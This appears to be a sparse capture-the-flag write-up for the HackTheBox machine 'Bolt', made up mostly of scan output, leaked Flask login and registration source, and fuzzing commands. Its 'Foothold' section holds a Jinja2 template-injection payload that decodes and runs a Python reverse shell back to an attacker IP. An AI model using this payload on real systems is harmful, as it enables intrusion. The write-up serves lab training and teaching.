HackTheBox-Bolt

NMAP

PORT    STATE SERVICE  REASON         VERSION                                                                                                       
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
443/tcp open ssl/http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Issuer: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-24T19:11:23
| Not valid after: 2022-02-24T19:11:23
| MD5: 3ac3 4f7c ee22 88de 7967 fe85 8c42 afc6
| SHA-1: c606 ca92 404f 2f04 6231 68be c4c4 644f e9ed f132

PORT 80 (HTTP)

# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from flask import jsonify, render_template, redirect, request, url_for
from flask_login import (
current_user,
login_required,
login_user,
logout_user
)
from app import db, login_manager
from app.base import blueprint
from app.base.forms import LoginForm, CreateAccountForm
from app.base.models import User
from hmac import compare_digest as compare_hash
import crypt
@blueprint.route('/')
def route_default():
return redirect(url_for('base_blueprint.login'))
## Login & Registration@blueprint.route('/login', methods=['GET', 'POST'])
def login():
login_form = LoginForm(request.form)
if 'login' in request.form:

# read form data
username = request.form['username']
password = request.form['password']
# Locate user
user = User.query.filter_by(username=username).first()

# Check the password
stored_password = user.password
stored_password = stored_password.decode('utf-8')
if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
login_user(user)
return redirect(url_for('base_blueprint.route_default'))
# Something (user or pass) is not ok
return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
if not current_user.is_authenticated:
return render_template( 'accounts/login.html',
form=login_form)
return redirect(url_for('home_blueprint.index'))
@blueprint.route('/register', methods=['GET', 'POST'])
def register():
login_form = LoginForm(request.form)
create_account_form = CreateAccountForm(request.form)
if 'register' in request.form:
username = request.form['username']
email = request.form['email' ]
data = User.query.filter_by(email=email).first()
if data is None:
# Check usename exists
user = User.query.filter_by(username=username).first()
if user:
return render_template( 'accounts/register.html',
msg='Username already registered',
success=False,
form=create_account_form)
# Check email exists
user = User.query.filter_by(email=email).first()
if user:
return render_template( 'accounts/register.html',
msg='Email already registered',
success=False,
form=create_account_form)
# else we can create the user
user = User(**request.form)
db.session.add(user)
db.session.commit()
return render_template( 'accounts/register.html',
msg='User created please <a href="/login">login</a>',
success=True,
form=create_account_form)
else:
return render_template( 'accounts/register.html', form=create_account_form)
@blueprint.route('/logout')
def logout():
logout_user()
return redirect(url_for('base_blueprint.login'))
## Errors@login_manager.unauthorized_handler
def unauthorized_handler():
return render_template('page-403.html'), 403
@blueprint.errorhandler(403)
def access_forbidden(error):
return render_template('page-403.html'), 403
@blueprint.errorhandler(404)
def not_found_error(error):
return render_template('page-404.html'), 404
@blueprint.errorhandler(500)
def internal_error(error):
return render_template('page-500.html'), 500
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from flask import jsonify, render_template, redirect, request, url_for
from flask_login import (
current_user,
login_required,
login_user,
logout_user
)
from app import db, login_manager
from app.base import blueprint
from app.base.forms import LoginForm, CreateAccountForm
from app.base.models import User
from hmac import compare_digest as compare_hash
import crypt
@blueprint.route('/')
def route_default():
return redirect(url_for('base_blueprint.login'))
## Login & Registration@blueprint.route('/login', methods=['GET', 'POST'])
def login():
login_form = LoginForm(request.form)
if 'login' in request.form:

# read form data
username = request.form['username']
password = request.form['password']
# Locate user
user = User.query.filter_by(username=username).first()

# Check the password
stored_password = user.password
stored_password = stored_password.decode('utf-8')
if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
login_user(user)
return redirect(url_for('base_blueprint.route_default'))
# Something (user or pass) is not ok
return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
if not current_user.is_authenticated:
return render_template( 'accounts/login.html',
form=login_form)
return redirect(url_for('home_blueprint.index'))
@blueprint.route('/register', methods=['GET', 'POST'])
def register():
login_form = LoginForm(request.form)
create_account_form = CreateAccountForm(request.form)
if 'register' in request.form:
username = request.form['username']
email = request.form['email' ]
code = request.form['invite_code']
if code != 'XNSS-HSJW-3NGU-8XTJ':
return render_template('code-500.html')
data = User.query.filter_by(email=email).first()
if data is None and code == 'XNSS-HSJW-3NGU-8XTJ':
# Check usename exists
user = User.query.filter_by(username=username).first()
if user:
return render_template( 'accounts/register.html',
msg='Username already registered',
success=False,
form=create_account_form)
# Check email exists
user = User.query.filter_by(email=email).first()
if user:
return render_template( 'accounts/register.html',
msg='Email already registered',
success=False,
form=create_account_form)
# else we can create the user
user = User(**request.form)
db.session.add(user)
db.session.commit()
return render_template( 'accounts/register.html',
msg='User created please <a href="/login">login</a>',
success=True,
form=create_account_form)
else:
return render_template( 'accounts/register.html', form=create_account_form)
@blueprint.route('/logout')
def logout():
logout_user()
return redirect(url_for('base_blueprint.login'))
## Errors@login_manager.unauthorized_handler
def unauthorized_handler():
return render_template('page-403.html'), 403
@blueprint.errorhandler(403)
def access_forbidden(error):
return render_template('page-403.html'), 403
@blueprint.errorhandler(404)
def not_found_error(error):
return render_template('page-404.html'), 404
@blueprint.errorhandler(500)
def internal_error(error):
return render_template('page-500.html'), 500
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://bolt.ht
b' -H "Host: FUZZ.bolt.htb" --sc 200
<html>
<body>
<p> %s </p>
<p> This e-mail serves as confirmation of your profile username changes.</p>
</body>
</html>

Foothold

{{config.__class__.__init__.__globals__['os'].popen('echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTAuMTQuOTUiLDIyMjIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=" |base64 -d | bash').read()}}

Privilege Escalation (Eddie)

PORT 443 (HTTPS)

Privilege Escalation (Root)

find / -user eddie 2>/dev/null | grep -v '/proc

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store